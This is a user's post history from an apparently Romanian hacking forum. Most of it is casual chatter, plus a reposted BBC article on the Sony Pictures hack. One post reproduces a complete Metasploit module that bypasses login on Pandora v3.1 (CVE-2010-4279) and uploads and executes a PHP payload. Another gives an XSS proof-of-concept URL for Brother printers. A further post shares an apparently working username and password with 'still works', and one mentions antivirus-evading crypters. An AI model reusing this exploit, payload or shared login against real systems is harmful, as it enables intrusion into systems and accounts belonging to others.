zpimp
-
Posts
50 -
Joined
-
Last visited
-
Days Won
1
Posts posted by zpimp
-
-
Un tutorial destul de interesant, m-am uitat putin pe link-ul de la sursa
si au posturi destul de ok.
-
E naspa doar 1 minut, nu prea ai ce vorbi intr-un minut decat
"Alo mama tu esti? vino sa ma iei acasa "
ON// Multumim!
-
pornind de la o imagine au aparut 999 conspiratii
-
Nici nu stiu astia ce sa mai zica
ba se stinge soarele ba incetineste pamantul, maine voi auzi ca in
2017 o sa ramanem fara porno.
-
-
Multumesc, adaugat a colectie
-
conteaza da poti sa il bagi si peste 2,3,4 luni.
il bagi cand vrei tu.
-
100% nu merge scannerul (testat) asta e aproape la fel de vechi ca revolutia.
inainte sa postezi testeaza si tu ca sa nu isi mai piarda alti useri timpul degeaba.
-
Acum merge perfect, dar a fost o problema ce a tinut cam 4-5 zile.
-
Linuxup dute inapoi pe IRC si nu veni aici cu flood si alte rahaturi de genu, incearca si tu sa evoluezi
vrei sa ramai la stadiul de copil?
-
Ma bucur ca ca exista oameni ca tine in Romania!
-
Felicitari pentru initiativa, dar totusi las-o mai usor cu spamul de aici ( toate acele bump , am facut update, am schimbat imaginea nu dau bine) e doar un sfat!
Bafta in continuare cu proiectul
-
@No1User nu mai este chiar FUD din cauza ca l-au scanat multi pe VirusTotal dar
nici nu il gasesc toate.
Oricum felicitari lui Byte-ul pentru munca depusa.
-
There was no precedent for how to deal with a hacking attack on the scale of that which hit Sony Pictures, its chief executive has said.
Michael Lynton said his firm had "no playbook" on how to respond.
In a wide-ranging interview with the Associated Press, he also described the scale of the attack, which the US government has blamed on North Korea.
But one security expert said that Sony should have spotted the danger and prepared contingency plans.
Lynton said that, immediately after the attack came to light, his company scrambled to restore communications, digging out old phones and working out how to pay staff with paper cheques.
'Adequately prepared'
"We are the canary in the coal mine, that's for sure," he told the Associated Press.
"There's no playbook for this, so you are in essence trying to look at the situation as it unfolds and make decisions without being able to refer to a lot of experiences you've had in the past or other people's experiences. You're on completely new ground."
And he told the agency of the scale of the data loss his company had suffered.
"They came in the house, stole everything, then burned down the house. They destroyed servers, computers, wiped them clean of all the data and took all the data."
He insisted his firm was "adequately prepared" but "just not for an attack of this nature", which he said that no firm could have withstood.
After a series of embarrassing leaks, the hackers threatened further attacks over Sony Pictures' film The Interview, which imagined the assassination of North Korean leader Kim Jong-un.
Several cinemas refused to show it on its planned Christmas day debut and Sony Pictures pulled the film altogether.
But it was later released online. Lynton insisted that the studio always planned some sort of release but did not know how to carry it out.
He said he called Google's chief executive Eric Schmidt, who told him: "This is what we've been waiting for."
Schmidt agreed to help get the film out on Google Play and YouTube. Sony built its own website and Microsoft's Xbox and Apple's iTunes also ultimately agreed to release the film, Lynton said.
"We probably in retrospect should have said we're exploring other options, because that's exactly what we were doing."
'Damage control'
But, according to security expert Brian Honan of BH Consulting, his company should have been better prepared and should have detected such a large data loss.
"It is hard to understand how more than 100 terabytes of data would leave someone's network undetected."
He pointed out that it was not the first assault on Sony's systems and said the company could have been better prepared to deal with both the attack and its fallout.
He suggested that, in the light of lawsuits brought by Sony Pictures employees over the loss of their personal data, Lynton's comments could be "damage control".
He said the Sony Pictures chief executive could be "trying to use the fact that the FBI has said it was the North Korean state and super cyber-ninjas, that an ordinary company using ordinary defences would not be able to defend itself".
"If he can say they took reasonable precautions, they cannot be blamed," he told the BBC.
FBI director James Comey insisted North Korea was behind the attack
Lynton's comments came after the FBI director James Comey said his agency was sure North Korea was behind the attack because the hackers "got sloppy".
"In nearly every case, [the hackers] used proxy servers to disguise where they were coming from in sending these emails and posting these statements. But several times they got sloppy.
"Several times, either because they forgot or because of a technical problem, they connected directly and we could see that the IPs they were using… were exclusively used by the North Koreans."
Articolul il gasiti : BBC News - Sony boss: 'No playbook' for dealing with hack attack
-
@Sir-Galahad e aiurea sa stea omu sa raspunda la 1000 de pm-uri si tot nu va stii sigur cine a schimbat parola...
Asta e nu apreciaza munca omului.
On:// Thank's
-
@Aerosol am citit prima parte acum ma apuc sa citesc si restul.
-
Salut si bine ai venit , pentru invitatie filelist poti posta la cereri invitatii si o sa primesti pe PM.
-
Inca merge :
uperlini:Barolo01
-
Mi-a prins cam 100 email's in 10 minute.
, bunicel dar pare ca sunt generate:P -
Ubuntu/Debian ruleaza perfect , am un pc mai vechi cu 2 gb ram si merge perfect debian.
-
Anonymous nu exista si nu va exista , sunt doar copii care sparg site-ul de la o brutarie,spalatorie auto,blogu lu nu stiu cine , in plus titlul nu are legatura cu continutul primului post titlul spune " Anonymous v-a disparea " , iar continut ca o sa se razbune pe site-urile de la arabi,musulmani , sincer nu are rost..
-
E o varianta a unui scanner free de mult timp , nu merge il poti arunca:))
-
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
'Description' => %q{
This module exploits an authentication bypass vulnerability in Pandora v3.1 as
disclosed by Juan Galiana Lara. It also integrates with the built-in pandora
upload which allows a user to upload arbitrary files to the '/images/' directory.
This module was created as an exercise in the Metasploit Mastery Class at Blackhat
that was facilitated by egypt and mubix.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Juan Galiana Lara', # Vulnerability discovery
'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module
'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module
'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module
'_flood <freshbones[at]gmail.com>', # Metasploit module
'mubix <mubix[at]room362.com>', # Auth bypass and file upload
'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload
],
'References' =>
[
['CVE', '2010-4279'],
['OSVDB', '69549'],
['BID', '45112']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'Privileged' => false,
'DisclosureDate' => "Nov 30 2010",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),
], self.class)
end
def check
base = target_uri.path
# retrieve software version from login page
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, 'index.php')
})
if res and res.code == 200
#Tested on v3.1 Build PC100609 and PC100608
if res.body.include?("v3.1 Build PC10060")
return Exploit::CheckCode::Appears
elsif res.body.include?("Pandora")
return Exploit::CheckCode::Detected
end
end
return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionError
print_error("#{peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
end
# upload a payload using the pandora built-in file upload
def upload(base, file, cookies)
data = Rex::MIME::Message.new
data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
data.add_part("Go", nil, nil, 'form-data; name="go"')
data.add_part("images", nil, nil, 'form-data; name="directory"')
data.add_part("1", nil, nil, 'form-data; name="upload_file"')
data_post = data.to_s
data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(base, 'index.php'),
'cookie' => cookies,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'vars_get' => {
'sec' => 'gsetup',
'sec2' => 'godmode/setup/file_manager',
},
'data' => data_post
})
register_files_for_cleanup(@fname)
return res
end
def exploit
base = target_uri.path
@fname = "#{rand_text_numeric(7)}.php"
cookies = ""
# bypass authentication and get session cookie
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, 'index.php'),
'vars_get' => {
'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',
'loginhash_user' => 'admin',
'loginhash' => '1',
},
})
# fix if logic
if res and res.code == 200
if res.body.include?("Logout")
cookies = res.get_cookies
print_status("Login Bypass Successful")
print_status("cookie monster = " + cookies)
else
fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed")
end
end
# upload PHP payload to images/[fname]
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
php = %Q|<?php #{payload.encoded} ?>|
begin
res = upload(base, php, cookies)
rescue ::Rex::ConnectionError
fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
end
if res and res.code == 200
print_good("#{peer} - File uploaded successfully")
else
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
end
# retrieve and execute PHP payload
print_status("#{peer} - Executing payload (images/#{@fname})")
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, 'images', "#{@fname}")
}, 1)
rescue ::Rex::ConnectionError
fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
end
end
endhttp://packetstormsecurity.com/files/129830/Pandora-3.1-Auth-Bypass-Arbitrary-File-Upload.html
-
Class Cross-Site Scripting
Remote Yes
Disclosed 9th October 2014
Published 7th January 2015
Credit Dave Daly of Dionach (vulns@dionach.com)
Confirmed Vulnerable Brother MFC-J4410DW with F/W Versions J and K
The printer administration web application on Brother MFC-J4410DW model printers with firmware versions older than version L (released 18th December 2014) are susceptible to a reflected cross-site scripting (XSS) vulnerability due to inadequately sanitised user input. An attacker may leverage this issue to run JavaScript in the context of a victim's browser.
F/W Versions J and K have been confirmed as vulnerable. Other versions may also be vulnerable.
The vulnerability affects all pages which accept the "url" querystring parameter. The following proof-of-concept example demonstrates this, using the "status" web page.
http://[printer]/general/status.html?url="/><script>alert("XSS!")</script><input type="hidden" value="
The vendor was notified of this issue in October 2014, and has reported that the vulnerability is addressed in the latest firmware version.http://packetstormsecurity.com/files/129841/Brother-MFC-J4410DW-Cross-Site-Scripting.htmlSource
Filme, seriale, documentare
in Discutii non-IT
Posted
The Texas Chain Saw Massacre (1974) - IMDb
The Texas Chainsaw Massacre (2003) - IMDb
Cele mai tari filme.